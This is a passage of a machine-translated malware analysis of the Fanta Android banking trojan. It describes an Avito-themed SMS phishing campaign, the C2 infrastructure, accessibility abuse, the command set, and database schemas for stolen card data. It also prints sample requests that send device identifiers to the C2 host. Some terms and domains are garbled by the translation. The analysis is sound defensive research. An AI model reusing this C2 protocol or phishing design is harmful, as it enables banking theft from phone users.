🥇Leisya, Fanta: பழைய ஆண்ட்ராய்டு ட்ரோஜனுக்கான புதிய யுக்தி

ஒரு நாள் நீங்கள் Avito இல் எதையாவது விற்க விரும்புகிறீர்கள், உங்கள் தயாரிப்பின் விரிவான விளக்கத்தை இடுகையிட்ட பிறகு (எடுத்துக்காட்டாக, ஒரு ரேம் தொகுதி), பின்வரும் செய்தியைப் பெறுவீர்கள்:

நீங்கள் இணைப்பைத் திறக்கும்போது, நீங்கள் வாங்கப்பட்டதை மகிழ்ச்சியான மற்றும் வெற்றிகரமான விற்பனையாளரான உங்களுக்குத் தெரிவிக்கும் ஒரு தீங்கற்ற பக்கத்தைக் காண்பீர்கள்:

"தொடரவும்" பொத்தானைக் கிளிக் செய்தவுடன், ஐகான் மற்றும் நம்பகமான பெயருடன் APK கோப்பு உங்கள் Android சாதனத்தில் பதிவிறக்கப்படும். சில காரணங்களுக்காக அணுகல் சேவை உரிமைகள் கோரப்பட்ட பயன்பாட்டை நிறுவியுள்ளீர்கள், பின்னர் இரண்டு சாளரங்கள் தோன்றி விரைவாக மறைந்துவிட்டன மற்றும் ... அவ்வளவுதான்.

உங்கள் இருப்பைச் சரிபார்க்க நீங்கள் செல்கிறீர்கள், ஆனால் சில காரணங்களால் உங்கள் வங்கி விண்ணப்பம் உங்கள் கார்டு விவரங்களை மீண்டும் கேட்கிறது. தரவை உள்ளிட்ட பிறகு, ஒரு பயங்கரமான விஷயம் நடக்கிறது: சில காரணங்களால் உங்களுக்கு இன்னும் புரியவில்லை, உங்கள் கணக்கில் இருந்து பணம் மறைந்துவிடும். நீங்கள் சிக்கலைச் சரிசெய்ய முயற்சிக்கிறீர்கள், ஆனால் உங்கள் தொலைபேசி எதிர்க்கிறது: இது பின் மற்றும் முகப்பு விசைகளை தானாகவே அழுத்துகிறது, அணைக்காது மற்றும் எந்த பாதுகாப்பு நடவடிக்கைகளையும் செயல்படுத்த உங்களை அனுமதிக்காது. இதன் விளைவாக, நீங்கள் பணம் இல்லாமல் இருக்கிறீர்கள், உங்கள் தயாரிப்பு வாங்கப்படவில்லை, நீங்கள் குழப்பமடைந்து ஆச்சரியப்படுகிறீர்கள்: என்ன நடந்தது?

பதில் எளிது: நீங்கள் Flexnet குடும்பமான Fanta Android ட்ரோஜனால் பாதிக்கப்பட்டவர். அது நடந்தது எப்படி? இப்போது விளக்குவோம்.

ஆசிரியர்கள்: ஆண்ட்ரி போலோவின்கின், ஜூனியர் தீங்கிழைக்கும் குறியீடு ஆய்வாளர், இவான் பிசரேவ், தீங்கிழைக்கும் குறியீடு ஆய்வாளர்.

சில புள்ளிவிவரங்கள்

ஆண்ட்ராய்டு ட்ரோஜான்களின் ஃப்ளெக்ஸ்நெட் குடும்பம் முதன்முதலில் 2015 இல் மீண்டும் அறிவிக்கப்பட்டது. மிகவும் நீண்ட கால நடவடிக்கையில், குடும்பம் பல கிளையினங்களாக விரிவடைந்துள்ளது: ஃபாண்டா, லைம்போட், லிப்டன் போன்றவை. ட்ரோஜன் மற்றும் அதனுடன் தொடர்புடைய உள்கட்டமைப்பு இன்னும் நிற்கவில்லை: புதிய பயனுள்ள விநியோக திட்டங்கள் உருவாக்கப்படுகின்றன - எங்கள் விஷயத்தில், ஒரு குறிப்பிட்ட பயனர் விற்பனையாளரை இலக்காகக் கொண்ட உயர்தர ஃபிஷிங் பக்கங்கள் மற்றும் ட்ரோஜன் டெவலப்பர்கள் ஃபேஷன் போக்குகளைப் பின்பற்றுகிறார்கள். வைரஸ் எழுதுதல் - அவை புதிய செயல்பாட்டைச் சேர்க்கின்றன, இது பாதிக்கப்பட்ட சாதனங்களிலிருந்து மிகவும் திறமையாக பணத்தைத் திருடுவதை சாத்தியமாக்குகிறது மற்றும் பாதுகாப்பு வழிமுறைகளைப் புறக்கணிக்கிறது.

இந்த கட்டுரையில் விவரிக்கப்பட்டுள்ள பிரச்சாரம் ரஷ்யாவைச் சேர்ந்த பயனர்களை இலக்காகக் கொண்டது, உக்ரைனில் குறைந்த எண்ணிக்கையிலான பாதிக்கப்பட்ட சாதனங்கள் பதிவு செய்யப்பட்டுள்ளன, மேலும் கஜகஸ்தான் மற்றும் பெலாரஸில் குறைவாகவே உள்ளன.

Flexnet ஆனது 4 ஆண்டுகளுக்கும் மேலாக ஆண்ட்ராய்டு ட்ரோஜன் அரங்கில் இருந்தும் பல ஆராய்ச்சியாளர்களால் விரிவாக ஆய்வு செய்யப்பட்டாலும், அது இன்னும் நல்ல நிலையில் உள்ளது. ஜனவரி 2019 முதல், சேதத்தின் சாத்தியமான அளவு 35 மில்லியனுக்கும் அதிகமான ரூபிள் ஆகும் - இது ரஷ்யாவில் பிரச்சாரங்களுக்கு மட்டுமே. 2015 ஆம் ஆண்டில், இந்த ஆண்ட்ராய்டு ட்ரோஜனின் பல்வேறு பதிப்புகள் நிலத்தடி மன்றங்களில் விற்கப்பட்டன, அங்கு நீங்கள் ட்ரோஜனின் மூலக் குறியீட்டை விரிவான விளக்கத்துடன் காணலாம். இதன் பொருள் உலகில் சேதத்தின் புள்ளிவிவரங்கள் இன்னும் ஈர்க்கக்கூடியவை. இவ்வளவு கிழவனுக்கு கெட்ட உருவம் இல்லை, இல்லையா?

விற்பனை முதல் மோசடி வரை

விளம்பரங்களை Avito வைப்பதற்கான இணைய சேவையின் கீழ் ஃபிஷிங் பக்கத்தின் முன்பு வழங்கப்பட்ட ஸ்கிரீன்ஷாட்டில் இருந்து பார்க்க முடியும், இது ஒரு குறிப்பிட்ட பாதிக்கப்பட்டவருக்கு தயாரிக்கப்பட்டது. வெளிப்படையாக, தாக்குதல் நடத்துபவர்கள் Avito இன் பாகுபடுத்திகளில் ஒன்றைப் பயன்படுத்துகின்றனர், விற்பனையாளரின் தொலைபேசி எண் மற்றும் பெயர் மற்றும் தயாரிப்பு பற்றிய விளக்கத்தை வெளியே இழுக்கிறார்கள். பக்கத்தை வரிசைப்படுத்தி, APK கோப்பைத் தயாரித்த பிறகு, பாதிக்கப்பட்டவரின் பெயருடன் ஒரு எஸ்எம்எஸ் செய்தி அனுப்பப்படும் மற்றும் அவரது தயாரிப்பின் விவரம் மற்றும் தயாரிப்பின் "விற்பனை" மூலம் பெறப்பட்ட தொகை ஆகியவற்றைக் கொண்ட ஃபிஷிங் பக்கத்திற்கான இணைப்பு. பொத்தானைக் கிளிக் செய்வதன் மூலம், பயனர் தீங்கிழைக்கும் APK கோப்பைப் பெறுகிறார் - ஃபாண்டா.

shcet491[.]ru டொமைனைப் பற்றிய ஒரு ஆய்வு, அது Hostinger இன் DNS சேவையகங்களுக்கு வழங்கப்பட்டுள்ளது என்பதைக் காட்டுகிறது:

ns1.hostinger.ru
ns2.hostinger.ru
ns3.hostinger.ru
ns4.hostinger.ru

டொமைன் மண்டலக் கோப்பில் IP முகவரிகள் 31.220.23[.]236, 31.220.23[.]243 மற்றும் 31.220.23[.]235 ஆகியவற்றைச் சுட்டிக்காட்டும் உள்ளீடுகள் உள்ளன. இருப்பினும், டொமைன் மாஸ்டர் ரிசோர்ஸ் ரெக்கார்டு (A-record) IP முகவரி 178.132.1[.]240 உடன் சர்வரைக் குறிக்கிறது.

ஐபி முகவரி 178.132.1[.]240 நெதர்லாந்தில் அமைந்துள்ளது மற்றும் ஹோஸ்டருக்கு சொந்தமானது உலக ஓட்டம். IP முகவரிகள் 31.220.23[.]235, 31.220.23[.]236 மற்றும் 31.220.23[.]243 ஆகியவை ஐக்கிய இராச்சியத்தில் அமைந்துள்ளன மற்றும் பகிர்ந்த ஹோஸ்டிங் சேவையகமான HOSTINGER ஐச் சேர்ந்தவை. பதிவாளராகப் பயன்படுத்தப்படுகிறது openprov-ru. டொமைன்கள் ஐபி முகவரி 178.132.1[.]240:

sdelka-ru[.]ru
தயாரிப்பு-av[.]ru
av-product[.]ru
en-deal[.]en
shcet382[.]ru
sdelka221[.]en
sdelka211[.]en
vyplata437[.]ru
viplata291[.]en
மொழிபெயர்ப்பு273[.]en
மொழிபெயர்ப்பு901[.]en

பின்வரும் வடிவமைப்பின் இணைப்புகள் கிட்டத்தட்ட எல்லா டொமைன்களிலிருந்தும் கிடைக்கின்றன என்பதைக் கவனத்தில் கொள்ள வேண்டும்:

http://(www.){0,1}<%domain%>/[0-9]{7}

இந்த டெம்ப்ளேட்டில் ஒரு எஸ்எம்எஸ் செய்தியின் இணைப்பும் உள்ளது. வரலாற்றுத் தரவுகளின்படி, மேலே உள்ள முறையின்படி பல இணைப்புகள் ஒரு டொமைனுடன் ஒத்துப்போகின்றன, இது பல பாதிக்கப்பட்டவர்களுக்கு ட்ரோஜனை விநியோகிக்க ஒரு டொமைனைப் பயன்படுத்துவதைக் குறிக்கிறது.

சற்று மேலே செல்லலாம்: ஒரு கட்டுப்பாட்டு சேவையகமாக, SMS இலிருந்து பதிவிறக்கம் செய்யப்பட்ட ட்ரோஜன் முகவரியைப் பயன்படுத்துகிறது onuseseddohap[.]கிளப். இந்த டொமைன் 2019-03-12 அன்று பதிவு செய்யப்பட்டது, 2019-04-29 முதல், APK பயன்பாடுகள் இந்த டொமைனுடன் தொடர்பு கொள்கின்றன. VirusTotal இலிருந்து பெறப்பட்ட தரவுகளின் அடிப்படையில், மொத்தம் 109 பயன்பாடுகள் இந்த சேவையகத்துடன் தொடர்பு கொண்டன. டொமைன் ஒரு IP முகவரியில் தீர்க்கப்படுகிறது 217.23.14[.]27, நெதர்லாந்தில் அமைந்துள்ளது மற்றும் ஹோஸ்டருக்கு சொந்தமானது உலக ஓட்டம். பதிவாளராகப் பயன்படுத்தப்படுகிறது பெயர்சீப். இந்த ஐபி முகவரிக்கு டொமைன்களும் தீர்க்கப்பட்டுள்ளன பேட்-ரக்கூன்[.]கிளப் (2018-09-25 முதல்) மற்றும் பேட்-ரக்கூன்[.]நேரடி (2018-10-25 முதல்). டொமைனுடன் பேட்-ரக்கூன்[.]கிளப் 80 க்கும் மேற்பட்ட APK கோப்புகளுடன் தொடர்பு கொண்டது பேட்-ரக்கூன்[.]நேரடி - 100 க்கும் மேற்பட்டவை.

பொதுவாக, தாக்குதலின் போக்கு பின்வருமாறு:

மூடியின் கீழ் ஃபாண்டா என்ன வைத்திருக்கிறது?

பல ஆண்ட்ராய்டு ட்ரோஜான்களைப் போலவே, ஃபாண்டாவும் எஸ்எம்எஸ் செய்திகளைப் படிக்கவும் அனுப்பவும் முடியும், யுஎஸ்எஸ்டி கோரிக்கைகளை உருவாக்கவும் மற்றும் அதன் சொந்த சாளரங்களை பயன்பாடுகளின் மேல் (வங்கி உட்பட) காட்டவும் முடியும். இருப்பினும், இந்த குடும்பத்தின் செயல்பாட்டின் ஆயுதக் களஞ்சியத்தில் வந்துவிட்டது: ஃபேன்டா பயன்படுத்தத் தொடங்கியது அணுகல் சேவை பல்வேறு நோக்கங்களுக்காக: பிற பயன்பாடுகளின் அறிவிப்புகளின் உள்ளடக்கங்களைப் படித்தல், பாதிக்கப்பட்ட சாதனத்தில் ட்ரோஜனைக் கண்டறிதல் மற்றும் செயல்படுத்துவதை நிறுத்துதல் போன்றவை. 4.4 ஐ விட பழைய அனைத்து ஆண்ட்ராய்டு பதிப்புகளிலும் ஃபேன்டா வேலை செய்கிறது. இந்த கட்டுரையில், பின்வரும் ஃபேன்டா மாதிரியை நாம் கூர்ந்து கவனிப்போம்:

MD5: 0826bd11b2c130c4c8ac137e395ac2d4
SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

ஏவப்பட்ட உடனேயே

தொடங்கப்பட்ட உடனேயே, ட்ரோஜன் அதன் ஐகானை மறைக்கிறது. பாதிக்கப்பட்ட சாதனத்தின் பெயர் பட்டியலில் இல்லை என்றால் மட்டுமே பயன்பாடு செயல்படும்:

android_x86
கற்பனையாக்கப்பெட்டியை
Nexus 5X(புல்ஹெட்)
Nexus 5(ரேஸர்)

இந்த சோதனை முக்கிய ட்ரோஜன் சேவையில் செய்யப்படுகிறது - முதன்மை சேவை. முதல் வெளியீட்டின் போது, பயன்பாட்டின் உள்ளமைவு அளவுருக்கள் இயல்புநிலை மதிப்புகளுடன் துவக்கப்படும் (உள்ளமைவு தரவு சேமிப்பக வடிவம் மற்றும் அவற்றின் பொருள் பின்னர் விவாதிக்கப்படும்), அத்துடன் கட்டுப்பாட்டு சேவையகத்தில் புதிய பாதிக்கப்பட்ட சாதனத்தின் பதிவு. செய்தி வகையுடன் ஒரு HTTP POST கோரிக்கை சேவையகத்திற்கு அனுப்பப்படும் பதிவு_போட் மற்றும் பாதிக்கப்பட்ட சாதனத்தைப் பற்றிய தகவல் (Android பதிப்பு, IMEI, தொலைபேசி எண், ஆபரேட்டர் பெயர் மற்றும் ஆபரேட்டர் பதிவுசெய்யப்பட்ட நாட்டின் குறியீடு). முகவரி மேலாண்மை சேவையகமாகப் பயன்படுத்தப்படுகிறது hXXp://onuseseddohap[.]club/controller.php. பதிலுக்கு, சேவையகம் புலங்களைக் கொண்ட செய்தியை அனுப்புகிறது bot_id, bot_pwd, சர்வர் - இந்த மதிப்புகள் CnC சேவையகத்தின் அளவுருக்களாக பயன்பாட்டால் சேமிக்கப்படும். அளவுரு சர்வர் புலம் பெறப்படவில்லை என்றால் விருப்பமானது: Fanta பதிவு முகவரியைப் பயன்படுத்துகிறது - hXXp://onuseseddohap[.]club/controller.php. CnC முகவரியை மாற்றுவதன் செயல்பாடு இரண்டு சிக்கல்களைத் தீர்க்கப் பயன்படுகிறது: பல சேவையகங்களுக்கு இடையில் சுமைகளை சமமாக விநியோகிக்க (அதிக எண்ணிக்கையிலான பாதிக்கப்பட்ட சாதனங்களுடன், மேம்படுத்தப்படாத வலை சேவையகத்தில் சுமை அதிகமாக இருக்கலாம்), மேலும் ஒரு மாற்றீட்டைப் பயன்படுத்தவும். CnC சேவையகங்களில் ஒன்று தோல்வியுற்றால் சேவையகம்.

கோரிக்கையை அனுப்பும்போது பிழை ஏற்பட்டால், ட்ரோஜன் 20 வினாடிகளுக்குப் பிறகு பதிவு செயல்முறையை மீண்டும் செய்யும்.

சாதனத்தை வெற்றிகரமாகப் பதிவுசெய்த பிறகு, பயனருக்கு ஃபேன்டா பின்வரும் செய்தியைக் காண்பிக்கும்:

முக்கிய குறிப்பு: ஒரு சேவை எனப்படும் கணினி பாதுகாப்பு - ட்ரோஜன் சேவையின் பெயர், மற்றும் பொத்தானைக் கிளிக் செய்த பிறகு சரி பாதிக்கப்பட்ட சாதனத்தின் அணுகல்தன்மை அமைப்புகளுடன் கூடிய ஒரு சாளரம் திறக்கும், அங்கு தீங்கிழைக்கும் சேவைக்கான அணுகல் உரிமையை பயனர் வழங்க வேண்டும்:

பயனர் இயக்கியவுடன் அணுகல் சேவை, Fanta பயன்பாட்டு சாளரங்களின் உள்ளடக்கங்களை அணுகுகிறது மற்றும் அவற்றில் செய்யப்படும் செயல்கள்:

அணுகல் உரிமையைப் பெற்ற உடனேயே, ட்ரோஜன் நிர்வாகி உரிமைகள் மற்றும் அறிவிப்புகளைப் படிப்பதற்கான உரிமைகளைக் கோருகிறது:

அணுகல் சேவையின் உதவியுடன், பயன்பாடு விசை அழுத்தங்களை உருவகப்படுத்துகிறது, இதன் மூலம் தேவையான அனைத்து உரிமைகளையும் வழங்குகிறது.

உள்ளமைவுத் தரவைச் சேமிக்கத் தேவையான தரவுத்தளங்களின் (பின்னர் விவரிக்கப்படும்) பல நிகழ்வுகளை Fanta உருவாக்குகிறது, அத்துடன் செயல்பாட்டின் போது சேகரிக்கப்பட்ட பாதிக்கப்பட்ட சாதனத்தைப் பற்றிய தகவல்களையும் உருவாக்குகிறது. சேகரிக்கப்பட்ட தகவலை அனுப்ப, தரவுத்தளத்திலிருந்து புலங்களை இறக்குவதற்கும் கட்டுப்பாட்டு சேவையகத்திலிருந்து கட்டளையைப் பெறுவதற்கும் வடிவமைக்கப்பட்ட தொடர்ச்சியான பணியை ட்ரோஜன் உருவாக்குகிறது. ஆண்ட்ராய்டின் பதிப்பைப் பொறுத்து CnC ஐ அழைப்பதற்கான இடைவெளி அமைக்கப்பட்டுள்ளது: 5.1 இல், இடைவெளி 10 வினாடிகள், இல்லையெனில் 60 வினாடிகள்.

ஒரு கட்டளையைப் பெற, ஃபாண்டா ஒரு கோரிக்கையை வைக்கிறது GetTask கட்டுப்பாட்டு சேவையகத்திற்கு. பதிலுக்கு, CnC பின்வரும் கட்டளைகளில் ஒன்றை அனுப்பலாம்:

அணி	விளக்கம்
0	SMS செய்தியை அனுப்பவும்
1	தொலைபேசி அழைப்பு அல்லது USSD கட்டளையை உருவாக்கவும்
2	அளவுருவைப் புதுப்பிக்கிறது இடைவெளி
3	அளவுருவைப் புதுப்பிக்கிறது இடைமறிப்பு
6	அளவுருவைப் புதுப்பிக்கிறது எஸ்எம்எஸ் மேலாளர்
9	SMS செய்திகளைச் சேகரிக்கத் தொடங்குங்கள்
11	ஃபோனை தொழிற்சாலை அமைப்புகளுக்கு மீட்டமைக்கவும்
12	உரையாடல் பெட்டிகளை உருவாக்குவதற்கான பதிவுகளை இயக்குதல்/முடக்குதல்

Fanta 70 வங்கி, விரைவான பணம் செலுத்துதல் மற்றும் மின்-வாலட் பயன்பாடுகளிலிருந்து அறிவிப்புகளை சேகரித்து அவற்றை ஒரு தரவுத்தளத்தில் சேமிக்கிறது.

கட்டமைப்பு அளவுருக்களின் சேமிப்பு

உள்ளமைவு அளவுருக்களை சேமிக்க, Fanta ஆனது Android இயங்குதளம் -க்கான நிலையான அணுகுமுறையைப் பயன்படுத்துகிறது விருப்பங்கள்- கோப்புகள். அமைப்புகள் பெயரிடப்பட்ட கோப்பில் சேமிக்கப்படும் அமைப்புகளை. சேமிக்கப்பட்ட அளவுருக்களின் விளக்கம் கீழே உள்ள அட்டவணையில் உள்ளது.

பெயர்	இயல்புநிலை மதிப்பு	சாத்தியமான மதிப்புகள்	விளக்கம்
id	0	முழு	பாட் ஐடி
சர்வர்	hXXp://onuseseddohap[.]club/	URL ஐ	மேலாண்மை சேவையக முகவரி
PWD	-	சரம்	சேவையக கடவுச்சொல்
இடைவெளி	20	முழு	நேர இடைவேளை. பின்வரும் பணிகளை எவ்வளவு காலம் தாமதப்படுத்துவது என்பதைக் காட்டுகிறது: அனுப்பப்பட்ட SMS செய்தியின் நிலை குறித்த கோரிக்கையை அனுப்பும்போது கட்டுப்பாட்டு சேவையகத்திலிருந்து புதிய கட்டளையைப் பெறுதல்
இடைமறிப்பு	அனைத்து	அனைத்து/தொலைபேசி எண்	புலம் சரத்திற்கு சமமாக இருந்தால் அனைத்து அல்லது தொலைபேசி எண், பின்னர் பெறப்பட்ட SMS செய்தி பயன்பாட்டால் இடைமறித்து பயனருக்குக் காட்டப்படாது
எஸ்எம்எஸ் மேலாளர்	0	0/1	இயல்புநிலை SMS பெறுநராக பயன்பாட்டை இயக்கவும் / முடக்கவும்
டயலாக் வாசிக்கவும்	தவறான	சரி தவறு	நிகழ்வு பதிவுகளை இயக்கு/முடக்கு அணுகல் நிகழ்வு

Fanta கோப்பையும் பயன்படுத்துகிறது எஸ்எம்எஸ் மேலாளர்:

பெயர்	இயல்புநிலை மதிப்பு	சாத்தியமான மதிப்புகள்	விளக்கம்
pckg	-	சரம்	பயன்படுத்தப்படும் SMS மேலாளரின் பெயர்

தரவுத்தள தொடர்பு

ட்ரோஜன் அதன் செயல்பாட்டின் போது இரண்டு தரவுத்தளங்களைப் பயன்படுத்துகிறது. பெயரிடப்பட்ட தரவுத்தளம் a தொலைபேசியிலிருந்து சேகரிக்கப்பட்ட பல்வேறு தகவல்களைச் சேமிக்கப் பயன்படுகிறது. இரண்டாவது தரவுத்தளத்திற்கு பெயரிடப்பட்டது fanta.db மற்றும் வங்கி அட்டைகள் பற்றிய தகவல்களைச் சேகரிக்க வடிவமைக்கப்பட்ட ஃபிஷிங் சாளரங்களை உருவாக்குவதற்குப் பொறுப்பான அமைப்புகளைச் சேமிக்கப் பயன்படுகிறது.

ட்ரோஜன் தரவுத்தளத்தைப் பயன்படுத்துகிறது а சேகரிக்கப்பட்ட தகவல்களைச் சேமித்து, அவர்களின் செயல்களைப் பதிவு செய்ய. தரவு ஒரு அட்டவணையில் சேமிக்கப்படுகிறது பதிவுகள். அட்டவணையை உருவாக்க பின்வரும் SQL வினவல் பயன்படுத்தப்படுகிறது:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

தரவுத்தளத்தில் பின்வரும் தகவல்கள் உள்ளன:

1. பாதிக்கப்பட்ட சாதனத்தை ஒரு செய்தியுடன் உள்நுழைதல் தொலைபேசி இயக்கப்பட்டது!

2. பயன்பாடுகளிலிருந்து அறிவிப்புகள். செய்தி பின்வரும் டெம்ப்ளேட்டின் படி உருவாக்கப்பட்டது:

(<%App Name%>)<%Title%>: <%Notification text%>

3. ட்ரோஜனால் உருவாக்கப்பட்ட ஃபிஷிங் படிவங்களிலிருந்து வங்கி அட்டை தரவு. அளவுரு VIEW_NAME பட்டியலில் ஒன்றாக இருக்கலாம்:

அலிஎக்ஸ்பிரஸ்
Avito
கூகிள் விளையாட்டு
இதர <%பயன்பாட்டு பெயர்%>

செய்தி வடிவத்தில் உள்நுழைந்துள்ளது:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. வடிவத்தில் உள்வரும் / வெளிச்செல்லும் SMS செய்திகள்:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. வடிவத்தில் உரையாடல் பெட்டியை உருவாக்கும் தொகுப்பு பற்றிய தகவல்:

(<%Package name%>)<%Package information%>

அட்டவணை உதாரணம் பதிவுகள்:

Fanta இன் செயல்பாடுகளில் ஒன்று வங்கி அட்டைகள் பற்றிய தகவல்களை சேகரிப்பதாகும். வங்கி பயன்பாடுகளைத் திறக்கும்போது ஃபிஷிங் சாளரங்களை உருவாக்குவதன் மூலம் தரவு சேகரிக்கப்படுகிறது. ட்ரோஜன் ஒரு முறை மட்டுமே ஃபிஷிங் சாளரத்தை உருவாக்குகிறது. சாளரம் பயனருக்குக் காட்டப்பட்ட தகவல் அட்டவணையில் சேமிக்கப்பட்டுள்ளது அமைப்புகளை தரவுத்தளத்தில் fanta.db. தரவுத்தளத்தை உருவாக்க பின்வரும் SQL வினவல் பயன்படுத்தப்படுகிறது:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

அனைத்து அட்டவணை புலங்கள் அமைப்புகளை முன்னிருப்பாக 1 (ஃபிஷிங் சாளரத்தை உருவாக்கவும்) துவக்கப்பட்டது. பயனர் தங்கள் தரவை உள்ளிட்ட பிறகு, மதிப்பு 0 ஆக அமைக்கப்படும். அட்டவணை புலங்கள் உதாரணம் அமைப்புகளை:

உள்நுழையலாம் - வங்கி விண்ணப்பத்தைத் திறக்கும்போது படிவத்தைக் காண்பிப்பதற்கு புலம் பொறுப்பாகும்
முதல்_வங்கி - பயன்படுத்துவதில்லை
முடியும்_avito - Avito பயன்பாட்டைத் திறக்கும்போது படிவத்தைக் காண்பிப்பதற்கு புலம் பொறுப்பாகும்
முடியும்_அலி - Aliexpress பயன்பாட்டைத் திறக்கும்போது படிவத்தைக் காண்பிப்பதற்கு புலம் பொறுப்பாகும்
முடியும்_மற்றொன்று - பட்டியலிலிருந்து எந்தவொரு பயன்பாட்டையும் திறக்கும்போது படிவத்தைக் காண்பிப்பதற்கு புலம் பொறுப்பாகும்: யூலா, பாண்டாவோ, ட்ரோம் ஆட்டோ, வாலட். தள்ளுபடி மற்றும் போனஸ் அட்டைகள், Aviasales, முன்பதிவு, Trivago
முடியும்_அட்டை - திறக்கும் போது படிவத்தைக் காட்டுவதற்கு புலம் பொறுப்பாகும் கூகிள் விளையாட்டு

கட்டுப்பாட்டு சேவையகத்துடன் தொடர்பு

கட்டுப்பாட்டு சேவையகத்துடன் பிணைய தொடர்பு HTTP நெறிமுறை வழியாக நடைபெறுகிறது. நெட்வொர்க்குடன் பணிபுரிய பிரபலமான ரெட்ரோஃபிட் லைப்ரரியை ஃபேன்டா பயன்படுத்துகிறது. கோரிக்கைகள் அனுப்பப்படுகின்றன hXXp://onuseseddohap[.]club/controller.php. சர்வரில் பதிவு செய்யும் போது சர்வர் முகவரியை மாற்றலாம். சேவையகத்திலிருந்து ஒரு குக்கீ திரும்பப் பெறப்படலாம். ஃபேன்டா சர்வரில் பின்வரும் கோரிக்கைகளை வைக்கிறது:

கட்டுப்பாட்டு சேவையகத்தில் பாட் பதிவு முதல் தொடக்கத்தில் ஒரு முறை நிகழ்கிறது. பாதிக்கப்பட்ட சாதனத்தைப் பற்றிய பின்வரும் தரவு சேவையகத்திற்கு அனுப்பப்படும்:
· குக்கீ - சேவையகத்திலிருந்து பெறப்பட்ட குக்கீகள் (இயல்புநிலை மதிப்பு வெற்று சரம்)
· முறையில் - சரம் மாறிலி பதிவு_போட்
· முன்னொட்டு - முழு எண் மாறிலி 2
· பதிப்பு_எஸ்டிகே - பின்வரும் வார்ப்புருவின் படி உருவாக்கப்பட்டது: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
· IMEI - பாதிக்கப்பட்ட சாதனத்தின் IMEI
· நாட்டின் - ஆபரேட்டர் பதிவுசெய்யப்பட்ட நாட்டின் குறியீடு, ஐஎஸ்ஓ வடிவத்தில்
· எண் - தொலைபேசி எண்
· ஆபரேட்டர் - ஆபரேட்டர் பெயர்

சேவையகத்திற்கு அனுப்பப்பட்ட கோரிக்கையின் எடுத்துக்காட்டு:
```
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>
```
கோரிக்கைக்கு பதிலளிக்கும் விதமாக, சேவையகம் பின்வரும் அளவுருக்கள் கொண்ட JSON பொருளை திருப்பி அனுப்ப வேண்டும்:
bot_id - பாதிக்கப்பட்ட சாதனத்தின் அடையாளங்காட்டி. bot_id 0 க்கு சமமாக இருந்தால், Fanta கோரிக்கையை மீண்டும் செயல்படுத்தும்.
bot_pwd - சேவையகத்திற்கான கடவுச்சொல்.
சர்வர் - கட்டுப்பாட்டு சேவையகத்தின் முகவரி. விருப்ப அளவுரு. அளவுரு குறிப்பிடப்படவில்லை என்றால், பயன்பாட்டில் சேமிக்கப்பட்ட முகவரி பயன்படுத்தப்படும்.

JSON பொருள் உதாரணம்:
```
{
    "response":[
   	 {
   		 "bot_id": <%BOT_ID%>,
   		 "bot_pwd": <%BOT_PWD%>,
   		 "server": <%SERVER%>
   	 }
    ],
    "status":"ok"
}
```

சேவையகத்திலிருந்து கட்டளையைப் பெறுவதற்கான கோரிக்கை. பின்வரும் தரவு சேவையகத்திற்கு அனுப்பப்படுகிறது:
· குக்கீ - சேவையகத்திலிருந்து பெறப்பட்ட குக்கீகள்
· முயற்சியில் - பாதிக்கப்பட்ட சாதனத்தின் ஐடி, கோரிக்கையை அனுப்பும்போது பெறப்பட்டது பதிவு_போட்
· PWD - சேவையகத்திற்கான கடவுச்சொல்
· divice_admin - புலம் நிர்வாகி உரிமைகள் பெறப்பட்டதா என்பதை தீர்மானிக்கிறது. நிர்வாகி உரிமைகள் பெறப்பட்டிருந்தால், புலம் சமமாக இருக்கும் 1, இல்லையெனில் 0
· அணுகல்தன்மை - அணுகல் சேவையின் நிலை. சேவை தொடங்கப்பட்டிருந்தால், மதிப்பு 1, இல்லையெனில் 0
· எஸ்எம்எஸ் மேலாளர் - SMS பெறுவதற்கான இயல்புநிலை பயன்பாடாக ட்ரோஜன் இயக்கப்பட்டிருக்கிறதா என்பதைக் காட்டுகிறது
· திரை - திரை எந்த நிலையில் உள்ளது என்பதைக் காட்டுகிறது. மதிப்பு அமைக்கப்படும் 1திரை இயக்கத்தில் இருந்தால், இல்லையெனில் 0;

சேவையகத்திற்கு அனுப்பப்பட்ட கோரிக்கையின் எடுத்துக்காட்டு:
```
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>
```
கட்டளையைப் பொறுத்து, சேவையகம் வெவ்வேறு அளவுருக்கள் கொண்ட JSON பொருளைத் தரலாம்:

· அணி SMS செய்தியை அனுப்பவும்: அளவுருக்களில் தொலைபேசி எண், SMS செய்தியின் உரை மற்றும் அனுப்ப வேண்டிய செய்தியின் அடையாளங்காட்டி ஆகியவை உள்ளன. வகையுடன் சேவையகத்திற்கு ஒரு செய்தியை அனுப்பும்போது அடையாளங்காட்டி பயன்படுத்தப்படுகிறது setSmsStatus.
```
{
    "response":
    [
   	 {
   		 "mode": 0,
   		 "sms_number": <%SMS_NUMBER%>,
   		 "sms_text": <%SMS_TEXT%>,
   		 "sms_id": %SMS_ID%
   	 }
    ],
    "status":"ok"
}
```
· அணி தொலைபேசி அழைப்பு அல்லது USSD கட்டளையை உருவாக்கவும்: தொலைபேசி எண் அல்லது கட்டளை பதிலின் உடலில் வரும்.
```
{
    "response":
    [
